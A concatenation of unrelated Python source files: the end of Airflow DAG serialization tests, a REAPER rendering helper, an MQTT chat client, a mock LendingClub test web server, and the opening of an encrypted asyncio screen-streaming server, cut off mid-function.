BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
        This test verifies that no new fields have been added to BaseOperator, and serves as a
        reminder that serialization support and tests must be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
            `airflow/serialization/schema.json` - they should have the correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
utils.py
|
import os
import sys
import glob
import time
import threading
import pretty_midi
import beyond.Reaper
from copy import deepcopy
from rearender.autogui import click_window
def traverse_dir(
root_dir,
extension=('mid', 'MID', 'midi'),
amount=None,
str_=None,
is_pure=False,
verbose=False,
is_sort=False,
is_ext=True):
if verbose:
print('[*] Scanning...')
file_list = []
cnt = 0
for root, _, files in os.walk(root_dir):
for file in files:
if file.endswith(extension):
if (amount is not None) and (cnt == amount):
break
if str_ is not None:
if str_ not in file:
continue
mix_path = os.path.join(root, file)
pure_path = mix_path[len(root_dir)+1:] if is_pure else mix_path
if not is_ext:
ext = pure_path.split('.')[-1]
pure_path = pure_path[:-(len(ext)+1)]
if verbose:
print(pure_path)
file_list.append(pure_path)
cnt += 1
if verbose:
print('Total: %d files' % len(file_list))
print('Done!!!')
if is_sort:
file_list.sort()
return file_list
def set_gobal_bpm(bpm):
retval, proj, ptidx, timeposOut, measureposOut, beatposOut, bpmOut, timesig_numOut, timesig_denomOut, lineartempoOut = Reaper.RPR_GetTempoTimeSigMarker(0, -1, 0, 0, 0, 0, 0, 0, 0)
Reaper.SetTempoTimeSigMarker(0, ptidx, timeposOut, measureposOut, beatposOut, bpm, timesig_numOut, timesig_denomOut, lineartempoOut)
Reaper.UpdateArrange()
Reaper.UpdateTimeline()
def clear_all():
    # delete items
Reaper.Main_OnCommand(40035, 0)
Reaper.Main_OnCommand(40006, 0)
    # go to start
Reaper.CSurf_GoStart()
def move_cursor_start():
Reaper.CSurf_GoStart()
def set_current_track(tidx):
Reaper.Main_OnCommand(40297, 0) # unselected all track
Reaper.SetTrackSelected( # set selected track
Reaper.GetTrack(0, tidx), True)
def set_track_media(path_track, tidx, is_press=False):
Reaper.CSurf_GoStart()
set_current_track(tidx)
if is_press:
t = threading.Thread(target=click_window)
t.start()
Reaper.InsertMedia(path_track, 0)
def render_media(
path_media,
path_audio,
bpm=None,
is_press=False,
track_idx=0):
'''
function for rendering single track midi file or audio file
the media will be inserted in the 1st track
'''
clear_all()
move_cursor_start()
# set bpm
if bpm:
set_gobal_bpm(int(bpm))
# set media
set_track_media(path_media, track_idx, is_press=is_press)
# set audio filename
filename = os.path.basename(path_audio)
outdir = path_audio[:-len(filename)]
print('filename:', filename)
print('outdir:', outdir)
Reaper.GetSetProjectInfo_String(0, "RENDER_FILE", outdir, True)
Reaper.GetSetProjectInfo_String(0, "RENDER_PATTERN", filename, True)
# save
Reaper.Main_OnCommand(40296, 0) # select all
Reaper.Main_OnCommand(41824, 0) # render project
def render_multi_media(
mapping_dict,
path_audio,
bpm=None,
is_press=None,
):
clear_all()
move_cursor_start()
# set bpm
if bpm:
set_gobal_bpm(int(bpm))
# set media
for idx, (track_idx, path_media) in enumerate(mapping_dict.items()):
if isinstance(is_press, list):
isp = is_press[idx]
else:
isp = is_press
        set_track_media(path_media, track_idx, is_press=isp)
# set audio filename
filename = os.path.basename(path_audio)
outdir = path_audio[:-len(filename)]
print('filename:', filename)
print('outdir:', outdir)
Reaper.GetSetProjectInfo_String(0, "RENDER_FILE", outdir, True)
Reaper.GetSetProjectInfo_String(0, "RENDER_PATTERN", filename, True)
# save
Reaper.Main_OnCommand(40296, 0) # select all
Reaper.Main_OnCommand(41824, 0) # render project
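# Hedged usage sketch (not part of the original file): how render_media and
# render_multi_media might be called. The file paths, track indices and BPM
# below are made-up example values, not paths that ship with this project.
def _example_render_calls():
    # Render a single MIDI file onto track 0 at 120 BPM.
    render_media('example/melody.mid', 'example/out/melody.wav', bpm=120)
    # Render several stems in one project; the mapping is {track_index: media_path}.
    render_multi_media(
        {0: 'example/melody.mid', 1: 'example/drums.mid'},
        'example/out/mix.wav',
        bpm=120,
    )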
if __name__ == '__main__':
# test functions here
pass
|
client.py
|
import argparse
import configparser
import threading
import json
import datetime
import time
import logging
import os
from that_automation_tool.communication import Communication
DEBUGGING = True
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
try:
fmsg = json.loads(msg.payload)
print("{}: {}".format(datetime.datetime.fromtimestamp(fmsg['timestamp']).strftime('%H:%M:%S'), fmsg['message']))
except Exception as e:
print(e)
print("{}: {} {}".format(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S'), msg.topic,
str(msg.payload)))
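# Hedged example (not part of the original file): the payload shape on_message
# expects on '/chat/#' topics, i.e. a JSON object carrying a UNIX 'timestamp'
# and a 'message' string; the message text below is a made-up value.
EXAMPLE_CHAT_PAYLOAD = json.dumps({"timestamp": time.time(), "message": "hello from group 3"})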
if __name__ == "__main__":
if DEBUGGING:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# get configuration path from arguments
parser = argparse.ArgumentParser(description="Do some IoT things")
parser.add_argument("-c", "--config", help="path to configuration file")
args = parser.parse_args()
if not args.config:
raise Exception("Configuration parameter missing")
cfg_pth = os.path.abspath(args.config)
logger.debug("Configuration path is %s", cfg_pth)
# read config file
config = configparser.ConfigParser()
config.read(cfg_pth)
if "MQTT" not in config.sections():
raise Exception("MQTT missing from configuration file")
mqtt_handler = Communication(config["MQTT"])
mqtt_handler.register_callback("/chat/#", on_message)
# set will to say goodbye to our friends
mqtt_handler.will = ("/chat/3", json.dumps({"event": "connection_lost"}), 2, False)
def threaded_thing():
while True:
msg = input()
# since we're group 3, this value is hardcoded
mqtt_handler.publish("/chat/3", msg, qos=2)
thrd = threading.Thread(target=threaded_thing)
    thrd.daemon = True
thrd.start()
mqtt_handler.connect_async()
while True:
# since our handler doesn't have a blocking run, we'll do it ourselves
time.sleep(2000)
|
server.py
|
#!/usr/bin/env python
"""
A dummy web server used to test the LendingClub API requests
"""
"""
The MIT License (MIT)
Copyright (c) 2013 Jeremy Gillick
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
import json
import urllib.parse
import cgi
import socketserver
from threading import Thread
from http.server import BaseHTTPRequestHandler
logging = None
http_session = {}
session_disabled = False
class TestServerHandler(BaseHTTPRequestHandler):
httpd = None
query = None
data = None
headers_sent = False
auth = {
'email': 'test@test.com',
'password': 'supersecret'
}
"""
Dummy authenticated email and password for this LendingClub server.
Any other combination will fail on auth.
"""
def log(self, msg):
global logging
msg = 'SERVER: {0}'.format(msg)
if logging is not None:
logging.debug(msg)
else:
print('{0}\n'.format(msg))
def start(self):
"""
Start the http server
"""
self.log('Server started...')
self.httpd.serve_forever()
def stop(self):
"""
Shutdown http server
"""
self.httpd.shutdown()
def send_headers(self, status_code=200, headers=None, content_type="text/plain"):
"""
Send all the HTTP headers and prepare the response for content
"""
self.send_response(status_code)
self.send_header('Content-Type', content_type)
if type(headers) is dict:
for key, value in headers.items():
self.send_header(key, value)
        # Debug by echoing the query and data back in the response headers
if self.query:
self.send_header('x-echo-query', repr(self.query))
if self.data:
self.send_header('x-echo-data', repr(self.data))
self.end_headers()
self.headers_sent = True
def read_asset_file(self, file_name):
"""
Read a file from the assets directory
"""
this_dir = os.path.dirname(os.path.realpath(__file__))
asset_file = os.path.join(this_dir, 'assets', file_name)
if not os.path.exists(asset_file):
raise Exception('The asset file \'{0}\' does not exist in {1}'.format(file_name, this_dir))
        with open(asset_file) as f:
            return f.read()
def write(self, output):
"""
Write to the response stream and send default headers if they haven't been sent yet
"""
        if self.headers_sent is False:
            self.send_headers()
        if isinstance(output, str):
            # BaseHTTPRequestHandler.wfile expects bytes under Python 3
            output = output.encode('utf-8')
        self.wfile.write(output)
def add_session(self, key, value):
"""
Add a value to the HTTP session
"""
global http_session
if not session_disabled:
http_session[key] = value
print('Add to session: {0}={1}'.format(key, value))
def output_file(self, file_name):
"""
Read a file from the assets directory and write it to response stream
"""
self.write(self.read_asset_file(file_name))
def output_error_json(self, message):
"""
Output a JSON error message to the response stream
"""
error = {
'result': 'error',
'error': [message]
}
self.write(json.dumps(error))
    def process_post_data(self):
        # headers.getheader() and cgi.parse_qs are Python 2 APIs; use the
        # email.message.Message.get() accessor and urllib.parse.parse_qs instead.
        content_len = int(self.headers.get('content-length', 0))
        postvars = urllib.parse.parse_qs(self.rfile.read(content_len).decode('utf-8'))
# Flatten values
for key, values in postvars.items():
if len(values) == 1:
postvars[key] = values[0]
self.data = postvars
def process_url(self):
"""
Separate the path from the query
"""
url = urllib.parse.urlparse(self.path)
self.path = url.path
self.query = urllib.parse.parse_qs(url.query)
# Flatten query string values
for key, values in self.query.items():
if len(values) == 1:
self.query[key] = values[0]
def do_GET(self):
"""
        Process a GET request
"""
global http_session
self.process_url()
path = self.path
query = self.query
#self.log('GET {0} {1}'.format(path, query))
# Summary page
if '/account/summary.action' == path:
self.write('Summary Page')
# Cash balance JSON
elif '/browse/cashBalanceAj.action' == path:
self.output_file('cashBalanceAj.json')
# Portfolio list
elif '/data/portfolioManagement' == path:
if 'method' in query:
if query['method'] == 'getLCPortfolios':
self.output_file('portfolioManagement_getLCPortfolios.json')
else:
self.write('Unknown method {0}'.format(query['method']))
else:
self.write('No method provided')
# Place order and strut token
elif '/portfolio/placeOrder.action' == path:
self.output_file('placeOrder.html')
# Select portfolio option and save to session
elif '/portfolio/recommendPortfolio.action' == path:
self.add_session('lending_match_point', query['lending_match_point'])
self.send_headers(302, {'location': '/portfolio/autoInvest.action'})
# Clear portfolio building session
elif '/portfolio/confirmStartNewPortfolio.action' == path:
if 'lending_match_point' in http_session:
del http_session['lending_match_point']
self.send_headers(302, {'location': '/portfolio/viewOrder.action'})
# Get list of loan fractions (must have lending_match_point set in the session)
elif '/data/portfolio' == path and 'getPortfolio' == query['method']:
if 'lending_match_point' in http_session:
self.output_file('portfolio_getPortfolio.json')
else:
print('lending_match_point was not set')
self.write('{"error": "The lending match point was not set"}')
# Saved filters
elif '/browse/getSavedFiltersAj.action' == path:
self.output_file('getSavedFiltersAj.json')
# One saved filter
elif '/browse/getSavedFilterAj.action' == path and 'id' in query and query['id'] in ['1', '2']:
self.output_file('getSavedFilterAj_{0}.json'.format(query['id']))
# Stage an order
elif '/data/portfolio' == path and 'addToPortfolioNew' == query['method']:
self.output_file('portfolio_addToPortfolioNew.json')
# Stage an order 2
elif '/data/portfolio' == path and 'addToPortfolio' == query['method']:
self.output_file('portfolio_addToPortfolio.json')
# Loan list for validation
elif '/filter_validation' == path and 'id' in query and query['id'] in ['1', '2', '3']:
self.output_file('filter_validate_{0}.json'.format(query['id']))
# Get a dump of the session
elif '/session' == path:
self.write(json.dumps(http_session))
# Nothing here yet
elif '/portfolio/autoInvest.action' == path:
self.write('/portfolio/autoInvest.action')
elif '/portfolio/viewOrder.action' == path:
self.write('/portfolio/viewOrder.action')
else:
self.write('{"error": "Unknown path"}')
def do_POST(self):
"""
        Process a POST request
"""
global http_session, session_disabled
#self.log('POST {0}'.format(self.path))
self.process_url()
self.process_post_data()
path = self.path
data = self.data
query = self.query
#self.log('Post Data {0}'.format(self.data))
# Login - if the email and password match, set the cookie
if '/account/login.action' == path:
if data['login_email'] == self.auth['email'] and data['login_password'] == self.auth['password']:
self.send_headers(302, {
'Set-Cookie': 'LC_FIRSTNAME=John',
'Content-Type': 'text/plain',
'location': '/account/summary.action'
})
return
else:
self.output_file('login_fail.html')
# Search
elif '/browse/browseNotesAj.action' == path and 'method' in data and data['method'] == 'search':
ver = '1'
if 'browseNotesAj' in http_session:
ver = http_session['browseNotesAj']
self.output_file('browseNotesAj_{0}.json'.format(ver))
# Investment option search
elif '/portfolio/lendingMatchOptionsV2.action' == path:
# Default filters
if data['filter'] == 'default':
self.output_file('lendingMatchOptionsV2.json')
# Custom filters
else:
self.output_file('lendingMatchOptionsV2_filter_1.json')
# Order confirmation
elif '/portfolio/orderConfirmed.action' == path:
if 'struts.token' in data and data['struts.token'].strip() != '':
self.output_file('orderConfirmed.html')
else:
print("No struts token passed")
self.write('{"error": "No struts token passed"}')
# Assign to portfolio
elif '/data/portfolioManagement' == path:
if 'method' in query:
# Existing portfolio
if 'addToLCPortfolio' == query['method']:
http_session['existing_portfolio'] = query['lcportfolio_name']
self.output_file('portfolioManagement_addToLCPortfolio.json')
# New portfolio
elif 'createLCPortfolio' == query['method']:
http_session['new_portfolio'] = query['lcportfolio_name']
self.output_file('portfolioManagement_createLCPortfolio.json')
else:
                    self.write('Unknown method: {0}'.format(query['method']))
else:
self.write('{"error": "No method passed"}')
# Select a loan note
elif '/browse/updateLSRAj.action' == path:
self.output_file('updateLSRAj.json')
# Disable the session
elif '/session/disabled' == path:
session_disabled = True
http_session = {}
self.write('Session disabled')
# Enable the session
elif '/session/enabled' == path:
session_disabled = False
self.write('Session enabled')
# Add the post data to the session
elif '/session' == path:
if session_disabled is True:
self.write('{"error": "Session disabled"}')
else:
for key, value in data.items():
self.add_session(key, value)
self.send_headers(302, {'location': '/session'})
else:
self.write('{"error": "Unknown path"}')
def do_HEAD(self):
"""
        Process a HEAD request
"""
return self.do_GET()
def do_DELETE(self):
"""
        Process a DELETE request
"""
global http_session
# Delete the session
if '/session' == self.path:
http_session = {}
self.write(json.dumps(http_session))
else:
self.send_headers(500)
self.write('Unknown delete action: {0}'.format(self.path))
class ReusableServer(socketserver.TCPServer):
allow_reuse_address = True
class TestWebServer:
"""
Simple class to start/stop the server
"""
http = None
def __init__(self):
#self.http = HTTPServer(('127.0.0.1', 7357), TestServerHandler)
pass
def start(self):
print('Starting server at 127.0.0.1:8000')
self.http = ReusableServer(('127.0.0.1', 8000), TestServerHandler)
self.http.serve_forever()
def stop(self):
print('Stopping server...')
self.http.shutdown()
self.http = None
class ServerThread:
"""
    Start the server in its own thread
"""
httpd = None
thread = None
def __init__(self):
self.httpd = TestWebServer()
self.thread = Thread(target=self.httpd.start)
self.thread.daemon = True
def start(self):
self.thread.start()
print('Server thread started')
def stop(self):
self.httpd.stop()
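# Hedged usage sketch (not part of the original file): how a test might start
# the dummy server on a background thread and hit one of the endpoints above.
# The short sleep only gives the listener time to bind before the request.
def _example_query_test_server():
    import time
    import urllib.request
    server_thread = ServerThread()
    server_thread.start()
    time.sleep(0.5)
    try:
        with urllib.request.urlopen('http://127.0.0.1:8000/session') as resp:
            print(resp.read())
    finally:
        server_thread.stop()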
#
# When called from the command line
#
if __name__ == '__main__':
server = TestWebServer()
try:
server.start()
except KeyboardInterrupt:
print('\nShutting down the test server')
server.stop()
|
streaming_multi_client_server_with_asyncio.py
|
# Need threading for multiple clients and a way to terminate gracefully
import threading
# Process command line arguments
import argparse
# Stamp the frames with a timestamp
import datetime
# May need for sleep
import time
# Necessary to process images with openCV
import numpy as np
import pyautogui
import imutils
import cv2
from PIL import UnidentifiedImageError, ImageFile
import os
# Needed for network communication
import pickle
import struct
# Needed to handle async calls
import asyncio
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
# Needed for logging
import logging
# Needed for exit handling
from contextlib import suppress
# Setting to handle partial frames
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Globals for handling the frames
outputFrame = None
lock = threading.Lock()
# Global to handle streaming loops
stream = True
# Vars for Select
read_list = []
write_list = []
message_queues = {}
dh_keyexchanges = {}
client_derived_keys_ivs = {}
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
g = 2
serialized_RSA_server_public_key = None
RSA_server_private_key = None
disable_ecdh = False
loop = None
restricted = False
trusted_keys_whitelist = {}
# thread that listens for any input, used to terminate stream loop
# def key_capture_thread(server_socket):
# global stream
# input()
# stream = False
# print("starting exit process")
def capture_frames():
global outputFrame, lock, stream, message_queues
main_logger = logging.getLogger("main")
try:
# while not event.is_set():
while stream:
##
# im = Image.open('.screenshot2021-0501_20-10-04-094593.png')
# im.load()
##
# Grab a screenshot
frame = pyautogui.screenshot()
# Convert it cv2 color format and np array
frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)
# Resize so we send consistent amount of data
frame = imutils.resize(frame, width=800)
# Stamp Frame with current time.
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
with lock:
outputFrame = frame.copy()
time.sleep(0.1)
# print("captured a screenshot")
# print(stream)
except UnidentifiedImageError as e:
quoted_filename = e.args[0].split()[4]
filename = quoted_filename.strip("'")
if os.path.exists(filename):
os.remove(filename)
main_logger.info("Deleted leftover temp image file")
except OSError as e:
if e.errno == 2:
main_logger.debug("During shutdown temp file was not written to disk, capture thread aborted")
pass
else:
raise e
def encrypt(key, plaintext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
encryptor = cipher.encryptor()
# Encrypt
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
return ciphertext
def decrypt(key, ciphertext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
decryptor = cipher.decryptor()
# Decrypt
deciphered_text = decryptor.update(ciphertext) + decryptor.finalize()
return deciphered_text
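# Hedged example (not part of the original file): round-tripping a payload
# through the AES-OFB helpers above with throwaway key/IV material.
def _example_aes_ofb_roundtrip():
    key = os.urandom(32)   # 256-bit AES key
    iv = os.urandom(16)    # 128-bit OFB initialisation vector
    ciphertext = encrypt(key, b"frame bytes", iv)
    assert decrypt(key, ciphertext, iv) == b"frame bytes"
    return ciphertext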
def generate_dh_key_pairs():
# Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
global p, g
# Use our p and g with cryptography library
params_numbers = dh.DHParameterNumbers(p, g)
parameters = params_numbers.parameters(default_backend())
# Generate private and public key
host_private_key = parameters.generate_private_key()
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
host_private_key = ec.generate_private_key(
ec.SECP384R1()
)
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
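# Hedged example (not part of the original file): both sides deriving the same
# shared secret from two key pairs produced by the ECDH helper above, mirroring
# the exchange performed later in new_client().
def _example_ecdh_shared_secret():
    server_priv, server_pub_enc = generate_ecdh_key_pairs()
    client_priv, client_pub_enc = generate_ecdh_key_pairs()
    server_secret = server_priv.exchange(ec.ECDH(), load_der_public_key(client_pub_enc, default_backend()))
    client_secret = client_priv.exchange(ec.ECDH(), load_der_public_key(server_pub_enc, default_backend()))
    assert server_secret == client_secret
    return server_secret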
def encrypt_and_send_AES_OFB_message(client_socket, plaintext, key, iv):
ciphertext = encrypt(key, plaintext, iv)
client_socket.send(len(ciphertext).to_bytes(2, "big") + ciphertext)
def lookupIP(client_socket, public_key):
client_socket.send(b'1')
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
output = client_socket.recv(1024)
return output
def registerPublicKey(client_socket, public_key, private_key):
client_socket.send(b'0')
signed_public_key = sign(private_key, public_key)
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
client_socket.send(len(signed_public_key).to_bytes(2, "big") + signed_public_key)
output = client_socket.recv(1024)
return output
def sign(private_key, data):
signature = private_key.sign(
data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return signature
def verify(public_key, signature, message):
# Verify signature
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
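# Hedged example (not part of the original file): signing and verifying a short
# message with the RSA-PSS helpers above, using a freshly generated throwaway
# key rather than the PEM key files the server normally loads.
def _example_sign_verify_roundtrip():
    from cryptography.hazmat.primitives.asymmetric import rsa
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    signature = sign(private_key, b"hello")
    verify(private_key.public_key(), signature, b"hello")  # raises InvalidSignature on mismatch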
async def new_client(reader, writer):
global lock, stream, outputFrame, serialized_RSA_server_public_key, RSA_server_private_key
global disable_ecdh, loop, restricted, trusted_keys_whitelist
main_logger = logging.getLogger("main")
client_logger = logging.getLogger("client")
addr = writer.get_extra_info('peername')
main_logger.info(f"Client connected: {addr}")
client_logger_extras = {'clientip': f"{addr[0]}", 'clientport': f"{addr[1]}"}
client_logger = logging.LoggerAdapter(client_logger, client_logger_extras)
try:
# --------- DH Key EXCHANGE START -----------##
if disable_ecdh:
host_private_key, host_public_key_enc = generate_dh_key_pairs()
else:
host_private_key, host_public_key_enc = generate_ecdh_key_pairs()
data = await reader.read(4)
size = None
serialized_RSA_client_public_key = None
abort = False
if data == b"HELO":
size = await reader.read(2)
serialized_RSA_client_public_key = await reader.read(int.from_bytes(size, "big"))
initial_message = (b"HELO" +
len(serialized_RSA_server_public_key).to_bytes(2, "big") +
serialized_RSA_server_public_key)
client_logger.debug(f"Public Key Received: {serialized_RSA_client_public_key}")
if restricted:
if serialized_RSA_client_public_key not in trusted_keys_whitelist:
client_logger.info("Rejecting client, not in whitelist")
initial_message = b"RJKT"
writer.write(initial_message)
await writer.drain()
abort = True
return
writer.write(initial_message)
await writer.drain()
else:
abort = True
return
data = await reader.read(5)
if data == b"DHINI" and not abort:
writer.write(len(host_public_key_enc).to_bytes(2, "big") + host_public_key_enc)
await writer.drain()
else:
abort = True
return
data = await reader.read(4)
if data == b"PUBK" and not abort:
# The ECDH Key
size = await reader.read(2)
remote_public_key_enc = await reader.read(int.from_bytes(size, "big"))
client_logger.debug(f"KeyExchange: Size of remote's public key: {int.from_bytes(size, 'big')}")
client_logger.debug(f"Remote's public key: {remote_public_key_enc}")
# The message signature
size = await reader.read(2)
remote_signature = await reader.read(int.from_bytes(size, "big"))
intended_message = (serialized_RSA_server_public_key +
serialized_RSA_client_public_key +
host_public_key_enc +
remote_public_key_enc)
verify(load_pem_public_key(serialized_RSA_client_public_key), remote_signature, intended_message)
client_logger.info("Message Verified")
# The host_signature to prove the intended public key was received
host_message = serialized_RSA_server_public_key + remote_public_key_enc
with lock:
host_signature = sign(RSA_server_private_key, host_message)
writer.write(len(host_signature).to_bytes(2, "big") + host_signature + b"DHFIN")
await writer.drain()
remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
if disable_ecdh:
shared_key = host_private_key.exchange(remote_public_key)
else:
shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
# client_derived_keys_ivs[s] = (derived_key, derived_iv)
# --------- DH Key EXCHANGE END -----------##
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Key: {derived_key}")
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id = 1
else:
abort = True
return
